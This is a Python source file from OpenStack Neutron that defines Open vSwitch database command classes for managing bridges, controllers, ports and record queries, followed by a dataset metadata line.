            # We're only using it to make a unit test work, so we should fix
            # this soon.
            if isinstance(val, collections.OrderedDict):
                val = dict(val)
            setattr(record, col, val)
class DbClearCommand(BaseCommand):
    """Reset one column of a record to an empty value of its current type."""
    def __init__(self, api, table, record, column):
        super(DbClearCommand, self).__init__(api)
        self.table = table
        self.record = record
        self.column = column
    def run_idl(self, txn):
        row = idlutils.row_by_record(self.api.idl, self.table, self.record)
        # Build an empty instance of whatever type the column holds now.
        empty = type(getattr(row, self.column))()
        setattr(row, self.column, empty)
class DbGetCommand(BaseCommand):
    """Read one column of a record, unwrapping single-element sets."""
    def __init__(self, api, table, record, column):
        super(DbGetCommand, self).__init__(api)
        self.table = table
        self.record = record
        self.column = column
    def run_idl(self, txn):
        row = idlutils.row_by_record(self.api.idl, self.table, self.record)
        # TODO(twilson) This feels wrong, but ovs-vsctl returns single results
        # on set types without the list. The IDL is returning them as lists,
        # even if the set has the maximum number of items set to 1. Might be
        # able to inspect the Schema and just do this conversion for that case.
        value = idlutils.get_column_value(row, self.column)
        if isinstance(value, list) and len(value) == 1:
            value = value[0]
        self.result = value
class SetControllerCommand(BaseCommand):
    """Replace the bridge's controller list with the given targets."""
    def __init__(self, api, bridge, targets):
        super(SetControllerCommand, self).__init__(api)
        self.bridge = bridge
        self.targets = targets
    def run_idl(self, txn):
        bridge = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.bridge)
        rows = []
        for target in self.targets:
            row = txn.insert(self.api._tables['Controller'])
            row.target = target
            rows.append(row)
        bridge.verify('controller')
        bridge.controller = rows
class DelControllerCommand(BaseCommand):
    """Remove every controller from the named bridge."""
    def __init__(self, api, bridge):
        super(DelControllerCommand, self).__init__(api)
        self.bridge = bridge
    def run_idl(self, txn):
        bridge = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.bridge)
        bridge.controller = []
class GetControllerCommand(BaseCommand):
    """Set result to the controller targets configured on the bridge."""
    def __init__(self, api, bridge):
        super(GetControllerCommand, self).__init__(api)
        self.bridge = bridge
    def run_idl(self, txn):
        bridge = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.bridge)
        bridge.verify('controller')
        self.result = [controller.target for controller in bridge.controller]
class SetFailModeCommand(BaseCommand):
    """Set the fail_mode column of the named bridge."""
    def __init__(self, api, bridge, mode):
        super(SetFailModeCommand, self).__init__(api)
        self.bridge = bridge
        self.mode = mode
    def run_idl(self, txn):
        bridge = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.bridge)
        bridge.verify('fail_mode')
        bridge.fail_mode = self.mode
class AddPortCommand(BaseCommand):
    """Create a port (and a matching interface row) on a bridge."""
    def __init__(self, api, bridge, port, may_exist):
        super(AddPortCommand, self).__init__(api)
        self.bridge = bridge
        self.port = port
        # When True, adding a port that already exists is a no-op.
        self.may_exist = may_exist
    def run_idl(self, txn):
        br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name', self.bridge)
        if self.may_exist:
            port = idlutils.row_by_value(self.api.idl, 'Port', 'name',
                                         self.port, None)
            if port:
                return
        # Insert the port row and register it on the bridge.
        port = txn.insert(self.api._tables['Port'])
        port.name = self.port
        br.verify('ports')
        ports = getattr(br, 'ports', [])
        ports.append(port)
        br.ports = ports
        # Every port carries at least one interface row of the same name.
        iface = txn.insert(self.api._tables['Interface'])
        iface.name = self.port
        port.verify('interfaces')
        ifaces = getattr(port, 'interfaces', [])
        ifaces.append(iface)
        port.interfaces = ifaces
class DelPortCommand(BaseCommand):
    """Delete a port (and its interface rows) from a bridge."""
    def __init__(self, api, port, bridge, if_exists):
        super(DelPortCommand, self).__init__(api)
        self.port = port
        self.bridge = bridge
        # When True, a missing port is treated as success, not an error.
        self.if_exists = if_exists
    def run_idl(self, txn):
        try:
            port = idlutils.row_by_value(self.api.idl, 'Port', 'name',
                                         self.port)
        except idlutils.RowNotFound:
            if self.if_exists:
                return
            msg = _LE("Port %s does not exist") % self.port
            raise RuntimeError(msg)
        if self.bridge:
            br = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                       self.bridge)
        else:
            # No bridge given: locate the bridge that owns this port.
            br = next(b for b in self.api._tables['Bridge'].rows.values()
                      if port in b.ports)
        if port.uuid not in br.ports and not self.if_exists:
            # TODO(twilson) Make real errors across both implementations
            # Bug fix: this message used self.name, an attribute this class
            # never defines (the port name is stored in self.port), so
            # building the error itself raised AttributeError.
            msg = _LE("Port %(port)s does not exist on %(bridge)s!") % {
                'port': self.port, 'bridge': self.bridge
            }
            LOG.error(msg)
            raise RuntimeError(msg)
        br.verify('ports')
        ports = br.ports
        ports.remove(port)
        br.ports = ports
        # Also remove port/interface directly for indexing?
        port.verify('interfaces')
        for iface in port.interfaces:
            self.api._tables['Interface'].rows[iface.uuid].delete()
        self.api._tables['Port'].rows[port.uuid].delete()
class ListPortsCommand(BaseCommand):
    """List the port names on a bridge, skipping the port that shares the
    bridge's own name."""

    def __init__(self, api, bridge):
        super(ListPortsCommand, self).__init__(api)
        self.bridge = bridge

    def run_idl(self, txn):
        bridge_row = idlutils.row_by_value(self.api.idl, 'Bridge', 'name',
                                           self.bridge)
        names = []
        for port_row in bridge_row.ports:
            if port_row.name != self.bridge:
                names.append(port_row.name)
        self.result = names
class PortToBridgeCommand(BaseCommand):
    """Resolve the name of the bridge that owns a given port."""

    def __init__(self, api, name):
        super(PortToBridgeCommand, self).__init__(api)
        self.name = name

    def run_idl(self, txn):
        # TODO(twilson) This is expensive!
        # This traversal of all ports could be eliminated by caching the bridge
        # name on the Port's (or Interface's for iface_to_br) external_id field
        # In fact, if we did that, the only place that uses to_br functions
        # could just add the external_id field to the conditions passed to find
        port = idlutils.row_by_value(self.api.idl, 'Port', 'name', self.name)
        # next() preserves the original behavior: StopIteration propagates
        # when no bridge references the port.
        owning = (br.name
                  for br in self.api._tables['Bridge'].rows.values()
                  if port in br.ports)
        self.result = next(owning)
class DbListCommand(BaseCommand):
    """List selected columns of selected records from an OVSDB table.

    :param table: name of the OVSDB table to list
    :param records: record ids/names to include; a false value means all rows
    :param columns: columns to report; defaults to every column plus _uuid
    :param if_exists: when True, silently skip records that do not exist
    """

    def __init__(self, api, table, records, columns, if_exists):
        super(DbListCommand, self).__init__(api)
        # Kept verbatim so run_idl can build a meaningful error message.
        self.requested_info = {'records': records, 'columns': columns,
                               'table': table}
        self.table = self.api._tables[table]
        # FIX: wrap keys() in list() — on Python 3 dict.keys() returns a
        # view, and view + list raises TypeError. Identical result on Py2.
        self.columns = columns or list(self.table.columns.keys()) + ['_uuid']
        self.if_exists = if_exists
        if records:
            self.records = []
            for record in records:
                try:
                    self.records.append(idlutils.row_by_record(
                        self.api.idl, table, record).uuid)
                except idlutils.RowNotFound:
                    if self.if_exists:
                        continue
                    raise
        else:
            # list() snapshots the uuids instead of holding a live view
            # (a Py3 keys() view would mutate under us if rows change).
            self.records = list(self.table.rows.keys())

    def run_idl(self, txn):
        try:
            self.result = [
                {
                    c: idlutils.get_column_value(self.table.rows[uuid], c)
                    for c in self.columns
                    if not self.if_exists or uuid in self.table.rows
                }
                for uuid in self.records
            ]
        except KeyError:
            # NOTE(kevinbenton): this is converted to a RuntimeError for compat
            # with the vsctl version. It might make more sense to change this
            # to a RowNotFoundError in the future.
            raise RuntimeError(_LE(
                "Row removed from DB during listing. Request info: "
                "Table=%(table)s. Columns=%(columns)s. "
                "Records=%(records)s.") % self.requested_info)
class DbFindCommand(BaseCommand):
    """Return selected columns of every table row matching *conditions*.

    :param table: name of the OVSDB table to search
    :param conditions: match conditions forwarded to idlutils.row_match
    :keyword columns: columns to report; defaults to all columns plus _uuid
    """

    def __init__(self, api, table, *conditions, **kwargs):
        super(DbFindCommand, self).__init__(api)
        self.table = self.api._tables[table]
        self.conditions = conditions
        # FIX: wrap keys() in list() — on Python 3 dict.keys() returns a
        # view, and view + list raises TypeError. Identical result on Py2.
        self.columns = (kwargs.get('columns') or
                        list(self.table.columns.keys()) + ['_uuid'])

    def run_idl(self, txn):
        self.result = [
            {
                c: idlutils.get_column_value(r, c)
                for c in self.columns
            }
            for r in self.table.rows.values()
            if idlutils.row_match(r, self.conditions)
        ]
| mandeepdhami/neutron | neutron/agent/ovsdb/native/commands.py | Python | apache-2.0 | 14,603 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.